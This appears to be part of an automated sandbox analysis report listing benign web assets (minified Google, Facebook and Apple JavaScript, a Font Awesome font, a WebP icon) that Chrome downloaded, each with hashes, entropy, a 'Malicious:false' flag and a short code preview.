                                                                                                                                                                                                                                Preview:!function t(e,i,n){function s(o,r){if(!i[o]){if(!e[o]){var l="function"==typeof require&&require;if(!r&&l)return l(o,!0);if(a)return a(o,!0);var c=new Error("Cannot find module '"+o+"'");throw c.code="MODULE_NOT_FOUND",c}var h=i[o]={exports:{}};e[o][0].call(h.exports,(function(t){return s(e[o][1][t]||t)}),h,h.exports,t,e,i,n)}return i[o].exports}for(var a="function"==typeof require&&require,o=0;o<n.length;o++)s(n[o]);return s}({1:[function(t,e,i){"use strict";e.exports={EventEmitterMicro:t(2)}},{2:2}],2:[function(t,e,i){"use strict";function n(){this._events={}}let s=n.prototype;s.on=function(t,e){return this._events[t]=this._events[t]||[],this._events[t].unshift(e),e},s.once=function(t,e){let i=this;return this.on(t,(function n(s){i.off(t,n),void 0!==s?e(s):e()}))},s.off=function(t,e){if(!this.has(t))return;if(1===arguments.length)return this._events[t]=null,void delete this._events[t];let i=this._events[t].indexOf(e);-1!==i&&this._events[t].splice(i,1)},s.trigger=function(t,e){if(thi
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (18484)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):963709
                                                                                                                                                                                                                                Entropy (8bit):5.670131488411997
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:24576:+EyX863Qv0/B/0duljOJ4nkCFeh/0aDMEwb3iZbeeseJ7aS8+vgAiTwlOKSqz79I:+EyX863QM/B/0duljOJ4nkCFeh/0aDMH
                                                                                                                                                                                                                                MD5:65D23943E6D8A616D4FF2C92D6AF40B6
                                                                                                                                                                                                                                SHA1:F2DC4736EAF04EDB77BD2C69D7E296D923B60DA1
                                                                                                                                                                                                                                SHA-256:D3E20C970001109C64DAE18E8BD66E5026841ED8DB191855EE93BEE75421F4AD
                                                                                                                                                                                                                                SHA-512:7381D0CEFF883CD8A73EF8D006842176581E05628E6D73987B6537F0520753A9437A3FF4F35EDD23B22DDA07D398254D240931A168B006CED02D830CAF7BA151
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:"https://www.gstatic.com/_/boq-play/_/js/k=boq-play.PlayStoreUi.ru.rIMe_465lJE.2021.O/ck=boq-play.PlayStoreUi.Y1yArtXW1Kk.L.B1.O/am=R7cZwOj6QDAJDPAPHgdjAQ/d=1/exm=FCpbqb,LEikZe,RqjULd,WhJNk,Wt6vjf,_b,_tp,byfTOb,hhhU8,lsjVmc/excm=_b,_tp,searchview/ed=1/wt=2/ujg=1/rs=AB1caFXJl0m234JZdkIlc9Y8a_1vUWHvZw/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;Hs0fpd:jLUKge;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;Rdd4dc:WXw8B;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAu0tf:z5Gxfe;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;sgjhQc:bQAegc;wR5FRb:O1Gjze;xqZiqf:BBI74;yEQyxe:TLjaTd;yxTchf:KUM7Z;zxnPse:GkRiKb/m=soHxf,IJGqxf,wg1P6b,ywOR5c,PHUIyb,BfdUQc,oEJvKc,kJXwXb,chfSwc,pCKBF,HnDLGf,RQJprf,gKWqec,tKHFxf,M2Qezd,rpbmN"
                                                                                                                                                                                                                                Preview:"use strict";_F_installCss(".EDId0c{position:relative}.nhh4Ic{position:absolute;left:0;right:0;top:0;z-index:1;pointer-events:none}.nhh4Ic[data-state=snapping],.nhh4Ic[data-state=cancelled]{transition:transform 200ms}.MGUFnf{display:block;width:28px;height:28px;padding:15px;margin:0 auto;transform:scale(0.7);background-color:#fafafa;border:1px solid #e0e0e0;border-radius:50%;box-shadow:0 2px 2px 0 rgba(0,0,0,.2);transition:opacity 400ms}.nhh4Ic[data-state=resting] .MGUFnf,.nhh4Ic[data-state=cooldown] .MGUFnf{transform:scale(0);transition:transform 150ms}.nhh4Ic .LLCa0e{stroke-width:3.6px;transform:translateZ(1px)}.nhh4Ic[data-past-threshold=false] .LLCa0e{opacity:.3}.rOhAxb{fill:#4285f4;stroke:#4285f4}.A6UUqe{display:none;stroke-width:3px;width:28px;height:28px}.tbcVO{width:28px;height:28px}.bQ7oke{position:absolute;width:0;height:0;overflow:hidden}.A6UUqe.qs41qe{animation-name:quantumWizSpinnerRotate;animation-duration:1568.63ms;animation-iteration-count:infinite;animation-timing-func
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:C source, ASCII text, with very long lines (4739)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):6156
                                                                                                                                                                                                                                Entropy (8bit):5.35625511599146
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:XmZ9kbptGzE4rTGqlBV5l5/IiNSZ1HPyy0KjEL2VcI:XmZ9kbGzEG5lBVL+iI2yljg6cI
                                                                                                                                                                                                                                MD5:C4CD29E090B8BB37F44EAE73DCFB0ABC
                                                                                                                                                                                                                                SHA1:6440CEF9A4CCD7198FCD669F775FAE65B52E63CD
                                                                                                                                                                                                                                SHA-256:1AF4A64548B3003042221EE0B21D889FD6420CCF1A981A1122DEE5FACE97E4B3
                                                                                                                                                                                                                                SHA-512:0363DAA966E9D41C9235C67C13C261BE41C3C5D513838CF328824F84385C1B5D3FEFCF54EA8E3FD9BAF9E1A48B671F15090D51089F6561E471B85549724ED446
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/y9/r/BTdUGzsTGVy.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("DOMControl",["$","DataStore"],(function(a,b,c,d,e,f){a=function(){"use strict";function a(a){this.root=b("$").fromIDOrElement(a),this.updating=!1,b("DataStore").set(a,"DOMControl",this)}var c=a.prototype;c.getRoot=function(){return this.root};c.beginUpdate=function(){if(this.updating)return!1;this.updating=!0;return!0};c.endUpdate=function(){this.updating=!1};c.update=function(a){if(!this.beginUpdate())return this;this.onupdate(a);this.endUpdate()};c.onupdate=function(a){};a.getInstance=function(a){return b("DataStore").get(a,"DOMControl")};return a}();e.exports=a}),null);.__d("Input",["CSS","DOMControl","DOMQuery"],(function(a,b,c,d,e,f,g){function h(a){return!/\S/.test(a||"")}function i(a){return h(a.value)}function a(a){return i(a)?"":a.value}function b(a){return a.value}function e(a,b){a.value=b||"";b=c("DOMControl").getInstance(a);b&&b.resetHeight&&b.resetHeight()}function f(a,b){b||(b=""),a.setAttribute("aria-label",b),a.setAttribute("placeholder",b)}funct
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (2992)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):14624
                                                                                                                                                                                                                                Entropy (8bit):5.37945237272042
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:jHrDs7bWXlMH+IBJHxPXqgY9uMM6GK3sLS6Fw6c0rGseCu:jH83/EbNMuso6eCu
                                                                                                                                                                                                                                MD5:451B306149A87391201CEFBA76C2D722
                                                                                                                                                                                                                                SHA1:3ACE4A5BC392A242AE41B05A20855AE6854E092C
                                                                                                                                                                                                                                SHA-256:84DEC8C0B0F0931D9E02A1CEAE479FE6D652396D332A79148932A1F65D412EFC
                                                                                                                                                                                                                                SHA-512:074B7292127EE19D7B77A4A79C569B59CFFEADCF62B4947F1CEB83F948CAE4FB2D2C2DB830FDDB93E66DE66CE7DF2234DD51210554A1B466F467EC993770738A
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3iEm34/yf/l/en_GB/M9F-Jw7q3uo.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("BUIAdoptionUtils",["invariant"],(function(a,b,c,d,e,f,g,h){"use strict";function a(a){switch(a){case"small":case"medium":return"small";case"large":return"medium";case"xlarge":case"xxlarge":return"large";case void 0:return void 0;default:h(0,11814,a)}}function b(a){switch(a){case"success":return"success";case"notify":return"information";case"recommend":return"warning";case"warn":return"error";case"quiet":return"information";case void 0:return void 0;default:h(0,11815,a)}}function c(a){return function(b){return a({value:b})}}g.convertSizeToFDSSize=a;g.convertUseToType=b;g.convertSelectorXUIOnChangeToSUIOnChange=c}),98);.__d("ImagePositioner.react",["clamp","react"],(function(a,b,c,d,e,f,g){"use strict";var h,i=h||d("react");a=function(a){babelHelpers.inheritsLoose(b,a);function b(){var b,d;for(var e=arguments.length,f=new Array(e),g=0;g<e;g++)f[g]=arguments[g];return(b=d=a.call.apply(a,[this].concat(f))||this,d.$2=function(a,b,c){var d=parseFloat(a),e=a.substr(d.t
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:Unicode text, UTF-8 text, with very long lines (664)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):14214
                                                                                                                                                                                                                                Entropy (8bit):5.423098025111413
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:5Ou495s6yYMkJqYWJ+Jaucgd/ix0BSc1e6t44KfKb6m3PbBISj:5BVuqYWJ+Jauld/g0BS56t4IuoPlISj
                                                                                                                                                                                                                                MD5:853877426A53490ADEDBCB2E1CE9624E
                                                                                                                                                                                                                                SHA1:BA2E275A1C0148B2F12CA53F17746BB920B7D555
                                                                                                                                                                                                                                SHA-256:F3163FB2E48B27F81ECCDB331EEBD4F05AEAF9AF7253765323A35E869D8E5D6B
                                                                                                                                                                                                                                SHA-512:12368317D1C18BD215ACB20B1D4EB859C72A7DA8FBD8299348E2D5A462EBE57BC015748330C4C1E07FF5404CEBE61B1A228145F9748D92C12DD2B00346AC910E
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://apps.apple.com/assets/chunk.572.93058cb1137c31242bbc.js
                                                                                                                                                                                                                                Preview:"use strict";(self.webpackChunk_ember_auto_import_=self.webpackChunk_ember_auto_import_||[]).push([[572],{24178:function(e,t,n){n.d(t,{BU:function(){return J},EE:function(){return q},GP:function(){return H},L5:function(){return Z},P0:function(){return R},Qk:function(){return B},SC:function(){return O},Z_:function(){return X},tO:function(){return ce},vc:function(){return k},wr:function(){return oe}}).var r={setDelegate:!0}.function o(e){return void 0!==e}function i(e){return o(e)&&null!==e}function a(e){return d(e)&&0===e.length}function u(e){return v(e)&&0===e.length}function s(e){return p(e)&&0===Object.keys(e).length}function l(e){return"function"==typeof e}function c(e){return"number"==typeof e}function f(e){return c(e)&&e%1==0}function d(e){return"string"==typeof e||e instanceof String}function v(e){return!!e&&e.constructor===Array}function p(e){return!!e&&e.constructor===Object}function h(e){return p(e)&&l(e.__lookupGetter__)&&l(e.__lookupSetter__)&&l(e.__defineGetter__)&&l(e.__de
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:Web Open Font Format (Version 2), TrueType, length 117852, version 773.1280
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):117852
                                                                                                                                                                                                                                Entropy (8bit):7.99152799541038
                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                SSDEEP:3072:Rs3c1iEht0b6W85CbPgRgaCMtsWOwydzrCyzhRaLZTBlZsEmOQadt:RDik3CzS8MtDOw+XaXZ8Of
                                                                                                                                                                                                                                MD5:B55B1345F0B919F0CAB774EC25D6654E
                                                                                                                                                                                                                                SHA1:C39DD7C713983702DE91B08AE00B194B0BDB9008
                                                                                                                                                                                                                                SHA-256:232C6F6A7678304F9EFAA26F30B1610DEBC2BA9F4CD636B5E6751C8D73761B92
                                                                                                                                                                                                                                SHA-512:793756B3BF0E21181D06F44593A99A1986B90DB4704F4765D4A1E8937ACF3D1D38A750C6D6082545BBC80C04FC8DC03DA5AB2B4A3F31B7F2345751050DF115FB
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.5.2/webfonts/fa-brands-400.woff2
                                                                                                                                                                                                                                Preview:wOF2.......\.......e.............................6.$. .`..l..:..8.p.... %2.q...<.....eDOZ-..UUU.......~..7........?........v\.7..7....."..)..#.r.z.....S..+.].-.%.2./.{..&..D.|'F.+e.. ._/.". O...sP.....;}.U...'VH...P.6`...".1.......+.K.O...S..T..R...dK..l).!'..M............g..@.%.#..8l.<..f...............j....sf....A,i`0.$A&4........%dc.l .tb...P.9_.}fF#.2&..r.6.%.I...+Z.>"..`E....'.Z?o43.....(Kr..l.r.M..`..M{].,c/G...G.C....U.wU.[u..7.L.L..n..%..r.I2..X.)...v...s.7...1..BU.}..]..`Q:A. EB..!V.-9....\\R.}../.z.K....$...Z.a.ge".O56Vc..+g..t.....F.k'V....50.......$&..D.....d...J4..n....L.C&'3....].k4......._(..G...n.h.U...>.>_..<..yD.<"s..G.......=.Y...X..Ym ...b...@6...f..@......h6...OpD...l..Ue ..(a6d+Y..Q.5J,..b7.....Z..z.b5..lVR...P....5q!...*c...)>,.I.*...-_...X.<.p.#tM.......l{...yC..4..$...O....dS&.o.N....i..8...`4.]...l...=^.f........^.x.v|..YNo.B..W....~../...J...Nk.=c-.}....@..g.Y9...:.l.?..M\.#...y.......!.....k.Y....t.".|I.
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (10672)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):25512
                                                                                                                                                                                                                                Entropy (8bit):5.5380769875937625
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:384:E6W9FDn62dhKmyqkXZ0XhnDGZjTVr1nDdU6DQGMq9wHAY:6FDn6HPZSahBvDQGMq8f
                                                                                                                                                                                                                                MD5:2F4D956ECEAB1D26E4CA599AFA43C5AB
                                                                                                                                                                                                                                SHA1:162DA72F1DAA41895100BC9D27690211C1B10637
                                                                                                                                                                                                                                SHA-256:2B4E3CBEB334AC5E6ED008EAE87AD245E74C4F4DB1C3BCC0BE192D421E228B03
                                                                                                                                                                                                                                SHA-512:DFE0E85011451E31217F5C5B0EB70C6F054398B90A4C1024364ABECDC60DE02BE7B2A4A98C7569B3E9C0D654D7DEC5E6E4741BBE99BE868005B21423B8E84246
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/yE/r/1rYlRSL7ILQ.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/../**. * License: https://www.facebook.com/legal/license/t3hOLs8wlXy/. */.__d("color-name-1.1.3",[],(function(a,b,c,d,e,f){"use strict";b={};var g={exports:b};function h(){g.exports={aliceblue:[240,248,255],antiquewhite:[250,235,215],aqua:[0,255,255],aquamarine:[127,255,212],azure:[240,255,255],beige:[245,245,220],bisque:[255,228,196],black:[0,0,0],blanchedalmond:[255,235,205],blue:[0,0,255],blueviolet:[138,43,226],brown:[165,42,42],burlywood:[222,184,135],cadetblue:[95,158,160],chartreuse:[127,255,0],chocolate:[210,105,30],coral:[255,127,80],cornflowerblue:[100,149,237],cornsilk:[255,248,220],crimson:[220,20,60],cyan:[0,255,255],darkblue:[0,0,139],darkcyan:[0,139,139],darkgoldenrod:[184,134,11],darkgray:[169,169,169],darkgreen:[0,100,0],darkgrey:[169,169,169],darkkhaki:[189,183,107],darkmagenta:[139,0,139],darkolivegreen:[85,107,47],darkorange:[255,140,0],darkorchid:[153,50,204],darkred:[139,0,0],darksalmon:[233,150,122],darkseagreen:[143,188,143],darkslateblue:[72,61
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3792)
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):9345
                                                                                                                                                                                                                                Entropy (8bit):5.263985222733283
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:96:5ncU1ciSTM/JvZLGCfKXuY3tZ8e1hwzTrubXQggbhDU/qFGK31yH0IYuApR2:mUnSTwOoKeiZn1hcwYDPFGK3g0HS
                                                                                                                                                                                                                                MD5:789920D64701571A8C9CC2C0A333661D
                                                                                                                                                                                                                                SHA1:5798B3B67D8B929875F4A006518ADBECFC331206
                                                                                                                                                                                                                                SHA-256:60382F476A01A84BE86A0B2CC5743185FC9E1F4FB378C13EDA734132EFCDB295
                                                                                                                                                                                                                                SHA-512:77C981AF5E2FDC8DC0FB51CD45F2C9ECB6C90D453A66B43C3C905785AE52E832BC0B21A891283D085407F822295DED0DA5A1B5E2852FB6CA8243409A48BE35EB
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://static.xx.fbcdn.net/rsrc.php/v3/yJ/r/KO2irUskl3Y.js
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("AdsToggleSource",["keyMirror"],(function(a,b,c,d,e,f,g){"use strict";a=c("keyMirror")({action_bar_button:null,action_column_cell:null,automated_brand_lift_opt_in:null,cm_tip:null,copy:null,create:null,drawer_button:null,draft_indicator_table_cell:null,dropdown_button:null,edit_button:null,editor_footer:null,editor_publish:null,external_quick_create:null,full_funnel_strategy_dialog:null,ig_login_ig_boosted_post_unsupported_error_banner:null,inline_publish_cta:null,insights_button:null,investigate_cta:null,keyboard_escape:null,keyboard_shortcut:null,lightweight_attribution_campaign_name:null,midflight_recs_resolution_card:null,onenav_tab:null,perf_summary_tip:null,reach_frequency_dialog:null,secondary_view_close_button:null,secondary_view_switcher:null,signal_loss_limits_card:null,split_test_convergence_tip:null,split_test_dialog:null,split_test_opted_in_campaign_group_published:null,split_test_draft_publish_prompt:null,split_test_beaker_icon_tooltip:null,start_yo
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                Category:downloaded
                                                                                                                                                                                                                                Size (bytes):536
                                                                                                                                                                                                                                Entropy (8bit):7.52888291256493
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:12:glPvZ8rMPc9PI50zUF799AGR/DinkhVj62pqJCI9tv2wsgDMnpR:ACrMQUF799/hDinknj6yI9tuwfQnv
                                                                                                                                                                                                                                MD5:42FA2E158D0BDDE364A460615B6882B2
                                                                                                                                                                                                                                SHA1:AAA3FF44AFCBE137C7260BD325B8A9AE82EF1709
                                                                                                                                                                                                                                SHA-256:F5C01B13D872E242577860F4BDF541651594BB4FF7B7F4863DD149E78F33D52D
                                                                                                                                                                                                                                SHA-512:0F286EC7F0FBD715585F6A643C3D9E2842FFF33931C5DE54B6D4CD3FC84A65A4C1429725D79C5230B38B11DEEE265B5F4A9355DEB68BA41E86246122111572A1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                URL:https://play-lh.googleusercontent.com/GeIJA3m3_3mR1kSeB4G0rBs2Lb65AZcwW9HZmlSCFBxqD-BZyY0Q_MSCl_Mcy3-S2RY=s64-rw
                                                                                                                                                                                                                                Preview:RIFF....WEBPVP8L..../?.....6.mU.....S.eX.......{.p.....kF.1....t.z...*...:$....B.:.:.......?....V..C.5.....S.....2./...]...L.fl..9#./.\.'...A..X0..-.P.'.<.i...(.|.G...H.....>I2.(d.K...B.I..D..*..g-...n.9(. .....sJ>........T.!"r.^.A..'#.4..+.I..l.^.....X....../.S.`..<..~.w=.....m.6.bl.N...bl.6?_.E..D._@P..N.....Y.Rf.T..h.v.....2..T.((...5.k.o...#.fCY~../...3T.TK5.P[Zn....s..G#R4.M...,.j.^.NMJS..::..-,jk..LNH.1h......-.h.F..7....Ym...............:..vH.Nh..4....t..G&.d...&.m.g......H...mi....F:..n.;....o..6..
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (8243)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):10408
                                                                                                                                                                                                                                Entropy (8bit):5.228704012543909
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:eZH7kUk70Eb1QAUf8HYTevU1gST4wLxr2:eRkR96ApHY2STr2
                                                                                                                                                                                                                                MD5:74F18E69FCEEB4513B9F24322BE7386E
                                                                                                                                                                                                                                SHA1:FE37CB92776F387DB632472296B0ADDEB815DD55
                                                                                                                                                                                                                                SHA-256:E3FDF2DDBE34D56ED6DB667544576B0821399F47124E09DC9671DD62CFD1DD28
                                                                                                                                                                                                                                SHA-512:7FAE4FBD35068C64252A7645D66FF19CFAF6FE02302A11070E503B315F58D12D48055A59DC72E7970E2FE0435D5095B6DE7FD61FA8C8DCCA07EC4DC376876B2D
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/../**. * License: https://www.facebook.com/legal/license/V9vdYColc4k/. */.__d("react-0.0.0",["React"],(function(a,b,c,d,e,f){"use strict";function a(a){return a&&typeof a==="object"&&"default"in a?a["default"]:a}var g=a(b("React"));d={};var h={exports:d};function i(){h.exports=g}var j=!1;function k(){j||(j=!0,i());return h.exports}function c(a){switch(a){case void 0:return k()}}e.exports=c}),null);.__d("react",["react-0.0.0"],(function(a,b,c,d,e,f){e.exports=b("react-0.0.0")()}),null);./**. * License: https://www.facebook.com/legal/license/t3hOLs8wlXy/. */.__d("resize-observer-polyfill-1.5.1",[],(function(a,b,c,d,e,f){"use strict";var g={},h={exports:g};function i(){(function(b,c){typeof g==="object"&&typeof h!=="undefined"?h.exports=c():b.ResizeObserver=c()})(this,function(){var b=function(){if(typeof Map!=="undefined")return Map;function a(a,b){var c=-1;a.some(function(d,a){if(d[0]===b){c=a;return!0}return!1});return c}return function(){function b(){this.__entries__=
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (3079)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):7366
                                                                                                                                                                                                                                Entropy (8bit):5.321790025737973
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:192:Goi9TDfbkVomRHx+tvD1btkzPRfk+sGQFvMmqJw:ygVtW71bG1fk+sG6vNT
                                                                                                                                                                                                                                MD5:5EA6E5C1344F9A72501CABA99893015A
                                                                                                                                                                                                                                SHA1:B4349BDFF54B80FED5EA1D1E7BBD62661E8ACC9D
                                                                                                                                                                                                                                SHA-256:7ED8D119427D4C430921861A2E4887F5224A8BB23A00EEFB525FC7E747C8E82E
                                                                                                                                                                                                                                SHA-512:50C49A0018B906FCE975ACFDB11FCA7E290C7C57E02AF7770543F44F5050FE678C63FA6EB499CE4C95AC096C13D18C66195DE026060170B057A2DA37920E2B02
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:var __ember_auto_import__.!function(){var e,n,t,r,o,i={90933:function(e,n,t){e.exports=function(){var e=_eai_d,n=_eai_r.function r(e){return e&&e.__esModule?e:Object.assign({default:e},e)}window.emberAutoImportDynamic=function(e){return 1===arguments.length?n("_eai_dyn_"+e):n("_eai_dynt_"+e)(Array.prototype.slice.call(arguments,1))},window.emberAutoImportSync=function(e){return n("_eai_sync_"+e)(Array.prototype.slice.call(arguments,1))},e("@amp/affiliate-util",[],(function(){return r(t(2353))})),e("@amp/foundation/-internals/network",[],(function(){return r(t(73624))})),e("@amp/foundation/-internals/storage",[],(function(){return r(t(92141))})),e("@amp/media-api-config-amp-books-realm",[],(function(){return r(t(52215))})),e("@amp/media-api-config-amp-podcasts-realm",[],(function(){return r(t(61384))})),e("@amp/media-api-config-apps-realm",[],(function(){return r(t(61069))})),e("@amp/media-api-legacy",[],(function(){return r(t(89176))})),e("@amp/web-app-components/custom-elements/locale
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (13410)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):34085
                                                                                                                                                                                                                                Entropy (8bit):5.435704551331771
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:768:BvKS9nEmwgCl8m84sBjX/ECRTLJMyECvwcZ+/lME2xngK3pX0Zl33t1SDCKc0Rq9:119EFl84sBjCyQoRCZBRgbO
                                                                                                                                                                                                                                MD5:55A61069B39F2F3F12CC81A90863870B
                                                                                                                                                                                                                                SHA1:6DAC0396D28002872C4DE3FB43B12ABA2EC95C17
                                                                                                                                                                                                                                SHA-256:2B16C355C8A82BD130D62F86AEEAB7B8901EDADDF560F06B546F4A3A8D6A849D
                                                                                                                                                                                                                                SHA-512:582905B7F4865B393DCE75F19F4B4D7467D629803F8D5E2178E8AE760DAFF934FC2F7CDAEE20D3964A2F882B2B1D9775D5AA2B5D3BD57182030354C0B185FD23
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("DevsiteAudienceNetworkTrackingPixels",["Event"],(function(a,b,c,d,e,f,g){"use strict";!function(a,b,c,d,e,f,g){if(a.fbq)return;e=a.fbq=function(){e.callMethod?e.callMethod.apply(e,arguments):e.queue.push(arguments)};a._fbq||(a._fbq=e);e.push=e;e.loaded=!0;e.version="2.0";e.queue=[];f=b.createElement(c);f.async=!0;f.src=d;g=b.getElementsByTagName(c)[0];g.parentNode.insertBefore(f,g)}(window,document,"script","https://connect.facebook.net/en_US/fbevents.js");var h="1668333663438923";function a(){window.fbq("init",h)}function b(a,b){window.fbq("trackCustom",a,babelHelpers["extends"]({},b))}function d(a,b,d,e){c("Event").listen(d,e,function(){window.fbq("trackCustom",a,babelHelpers["extends"]({},b))})}g.init=a;g.track=b;g.setupEventTracker=d}),98);.__d("DevsitePartnershipsTrackingPixels",["Event"],(function(a,b,c,d,e,f,g){"use strict";!function(a,b,c,d,e,f,g){if(a.fbq)return;e=a.fbq=function(){e.callMethod?e.callMethod.apply(e,arguments):e.queue.push(arguments)};a._
                                                                                                                                                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (17135)
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):59956
                                                                                                                                                                                                                                Entropy (8bit):5.264511741037863
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:1536:n9txPZhgztxqYWkfk2iXUymBqBVvjogt4+wXZs8n1i+wcHuZRsF7d6BOLQuR4gI7:Hhwt2woZmo
                                                                                                                                                                                                                                MD5:FC79B275417070FC0052283D97BB5B31
                                                                                                                                                                                                                                SHA1:0E53644F25080A5E627B6EBA7CD265DE4AD4C7D2
                                                                                                                                                                                                                                SHA-256:F66EF0A2BC1E35C7FDBC6DD68862D6FC17AB43956C7C6FE1BC39AD9892D7A168
                                                                                                                                                                                                                                SHA-512:2212C600F5EBBCAFAFDEA64C6DB899716A09578C7F718FBF43D82DDDD5DFA8D10AA37AE8DFB9868CBBF563F278E88C1180A0D6D4CD8E3F82B64F25D8EC2EB7E1
                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                Reputation:low
                                                                                                                                                                                                                                Preview:;/*FB_PKG_DELIM*/..__d("CLS",[],(function(a,b,c,d,e,f){"use strict";var g=typeof ((b=window.PerformanceObserver)==null?void 0:(c=b.supportedEntryTypes)==null?void 0:c.includes)==="function"&&window.PerformanceObserver.supportedEntryTypes.includes("layout-shift");function a(){if(!g)return null;var a=0,b=0,c=[],d=new window.PerformanceObserver(function(d){for(var d=d.getEntries(),e=Array.isArray(d),f=0,d=e?d:d[typeof Symbol==="function"?Symbol.iterator:"@@iterator"]();;){var g;if(e){if(f>=d.length)break;g=d[f++]}else{f=d.next();if(f.done)break;g=f.value}g=g;if(!g.hadRecentInput){var h=c[0],i=c[c.length-1];b&&g.startTime-i.startTime<1e3&&g.startTime-h.startTime<5e3?(b+=g.value,c.push(g)):(b=g.value,c=[g]);b>a&&(a=b)}}});d.observe({buffered:!0,type:"layout-shift"});return function(){d.disconnect();return a}}f.getCLSCallback=a}),66);.__d("getReactComponentDisplayName",[],(function(a,b,c,d,e,f){"use strict";function a(a){var b=a.displayName;if(b!=null)return b;return a.name!=null?a.name:"Rea
